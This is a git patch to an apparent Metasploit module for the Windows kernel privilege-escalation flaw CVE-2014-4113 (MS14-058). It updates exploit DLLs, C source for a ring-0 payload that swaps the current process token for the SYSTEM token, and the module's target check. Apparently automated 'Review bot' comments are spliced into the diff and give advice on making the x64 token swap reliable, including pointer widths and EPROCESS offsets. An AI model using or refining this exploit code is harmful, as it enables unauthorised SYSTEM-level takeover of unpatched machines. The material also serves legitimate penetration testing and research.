From 6574db5dbbb9930dc8833fddce74cdfdd903a750 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Thu, 30 Oct 2014 17:01:59 -0500
Subject: [PATCH] Fix the 64 bits code
---
 .../CVE-2014-4113/cve-2014-4113.x64.dll | Bin 85504 -> 85504 bytes
 .../CVE-2014-4113/cve-2014-4113.x86.dll | Bin 73216 -> 73216 bytes
 .../cve-2014-4113/cve-2014-4113.c | 15 +++++++++------
 .../local/ms14_058_track_popup_menu.rb | 6 +-----
 4 files changed, 10 insertions(+), 11 deletions(-)
diff --git a/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll b/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll
index 2b83c1358c95212f81397eae8c5ca0bcc9a0a4ad..24ccff32fc0d371ec58aa796338d5bab3acef057 100755
GIT binary patch
delta 71
zcmZpe!`d*1b;1v(Y6}!(=b6Ch_hY|3z8s85umfeN+@2cQP27|^wf!*{W1$dG*Y+@3##IIY@Vy$j
delta 71
zcmZpe!`d*1b;1v(xrGyd`7u8|!noO+@gE1{kI7zKP2$Nn{)@8MGctH|`=}^5?qpzM
bVCcT=lid86Yx`p^#zG;WuI*v6jH?U){^}Zw
diff --git a/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll b/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll
index e2d5aa76bc7670748d52be0a442f520502cd91b9..fd71f95119f5b9b4d9bb9c9065c1cce933e2d295 100755
GIT binary patch
delta 30
lcmZqJ!_u&aWx@xhrp*&S`7xdF+w8=6=`)bGS?ud84FKRo4&wj-
delta 30
lcmZqJ!_u&aWx@xhlER6f{Fqjs+U&%5=`)bGS?ud84FKI84x#`6
diff --git a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
index 1c59213cfe..d81d9d224c 100755
--- a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
+++ b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
@@ -38,7 +38,7 @@ typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
 OUT PVOID Process
 );
-typedef NTSTATUS(NTAPI *lPsReferencePrimaryToken)(
+typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
 _Inout_ PVOID Process
 );
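Review bot: The corrected typedef should carry a comment saying what it is and what the caller owes: this is the ntoskrnl export resolved at runtime, and the PACCESS_TOKEN it returns is a referenced token, while the ring-0 payload later in this diff takes two such references (target and SYSTEM) with no PsDereferencePrimaryToken visible anywhere in the patch. For a token-swap payload the leaked references are harmless, arguably even useful because they keep the SYSTEM token alive, but that should be written down rather than left for the next reader to work out. I would add, above the typedef, `// ntoskrnl!PsReferencePrimaryToken, resolved at runtime. Returns a referenced token; this payload never drops the reference on purpose.` As a style point, the two adjacent typedefs mix the old `OUT` macro with SAL `_Inout_`; pick one form so the prototypes read consistently.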
@@ -137,7 +137,7 @@ DWORD_PTR __stdcall get_threadinfo_ptr(void)
 // Search the specified data structure for a member with CurrentValue.
-BOOL FindAndReplaceMember(PDWORD Structure,
+BOOL find_and_replace_member(PDWORD Structure,
 DWORD CurrentValue,
 DWORD NewValue,
 DWORD MaxSize)
@@ -146,8 +146,11 @@ BOOL FindAndReplaceMember(PDWORD Structure,
 // Microsoft QWORD aligns object pointers, then uses the lower three
 // bits for quick reference counting.
+#ifdef _M_X64
+ Mask = ~0xf;
+#else
 Mask = ~7;
-
+#endif
 // Mask out the reference count.
 CurrentValue &= Mask;
@@ -174,11 +177,11 @@ int _stdcall shellcode_ring0(int one, int two, int three, int four)
 pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &pMyProcessInfo);
 pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo);
- TargetToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pMyProcessInfo);
- SystemToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pSystemInfo);
+ TargetToken = pPsReferencePrimaryToken(pMyProcessInfo);
+ SystemToken = pPsReferencePrimaryToken(pSystemInfo);
 // Find the token in the target process, and replace with the system token.
- FindAndReplaceMember((PDWORD)pMyProcessInfo,
+ find_and_replace_member((PDWORD)pMyProcessInfo,
 (DWORD)TargetToken,
 (DWORD)SystemToken,
 0x200);
diff --git a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb
index 474404f68f..e6a388f10c 100644
--- a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb
+++ b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb
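Review bot: The comment directly above the new `#ifdef _M_X64` still says object pointers are QWORD-aligned with the lower three bits used for reference counting, which after this change is only true of the `#else` branch; the x64 branch masks four bits and the comment now contradicts the code beneath it. Replace the two comment lines with something like `// EX_FAST_REF: the object pointer is 8-byte aligned on x86 (low 3 bits hold the fast-ref count) and 16-byte aligned on x64 (low 4 bits); strip those bits before comparing.` The new literal `~0xf` is a signed int (-16) that only becomes the intended all-ones-above mask through the conversion on assignment, and `Mask`'s declaration is outside the hunk, so `Mask = ~(DWORD_PTR)0xf;` (and the x86 counterpart) would make the operand width explicit. find_and_replace_member continues past the end of the hunk.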
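Review bot: The `(DWORD)TargetToken` and `(DWORD)SystemToken` arguments at the end of the hunk truncate 64-bit token pointers to their low 32 bits, and since find_and_replace_member (signature in the hunk at line 137, body outside the diff) scans `PDWORD` slots and writes a `DWORD`, on x64 the swap matches only on the low half of the pointer and overwrites only the low half of the 8-byte EPROCESS Token field. That works on Windows 7 x64 only if both tokens happen to share the same upper 32 bits of their pool addresses, which is an unstated assumption rather than a fix for 64 bits. Widen the helper to pointer-sized units (`PDWORD_PTR`/`DWORD_PTR`, which the file already uses for get_threadinfo_ptr), make the loop body step in pointer-sized slots, and drop the narrowing casts as below; also confirm how `MaxSize` is counted, because on Windows 7 x64 the Token member sits past 0x200 bytes into EPROCESS (0x208 if I recall correctly), so a byte-counted limit of 0x200 would stop short. shellcode_ring0 continues outside the hunk, and no PsDereferencePrimaryToken for the two references taken here is visible in the diff.
```c
BOOL find_and_replace_member(PDWORD_PTR Structure,
                             DWORD_PTR CurrentValue,
                             DWORD_PTR NewValue,
                             DWORD MaxSize)
/* … unchanged: mask selection and scan body (must index pointer-sized slots) … */

/* … unchanged: shellcode_ring0 process lookups and token references … */
    find_and_replace_member((PDWORD_PTR)pMyProcessInfo,
                            (DWORD_PTR)TargetToken,
                            (DWORD_PTR)SystemToken,
                            0x200);
```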
@@ -94,11 +94,7 @@ class Metasploit3 < Msf::Exploit::Local
 return Exploit::CheckCode::Safe if build == 9200
 return Exploit::CheckCode::Safe if build == 9600
- if arch == ARCH_X86
- return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
- else
- return Exploit::CheckCode::Detected if build == 7601
- end
+ return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
 return Exploit::CheckCode::Unknown
 end
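Review bot: The merged condition now reports `Detected` for x64 targets on builds 2600, 3790 and 7600 as well, but nothing in this commit indicates the rebuilt x64 DLL was exercised on anything other than 7601, the only x64 build the removed branch admitted; unless XP/2003 x64 and 7600 x64 were actually tested, keep the arch split, or at least document the tested set with `# x64 payload only verified on Windows 7 SP1 x64 (build 7601)`. The `arch` value the removed branch consulted is presumably still computed above the hunk and is now unused. The surrounding `Safe` returns for 9200/9600 (context lines) tell the operator the host is not vulnerable, whereas as far as I recall MS14-058 also covered Windows 8/8.1 and the module simply has no payload for them; `Exploit::CheckCode::Unknown` with a comment would be more honest. The enclosing check method starts outside the hunk.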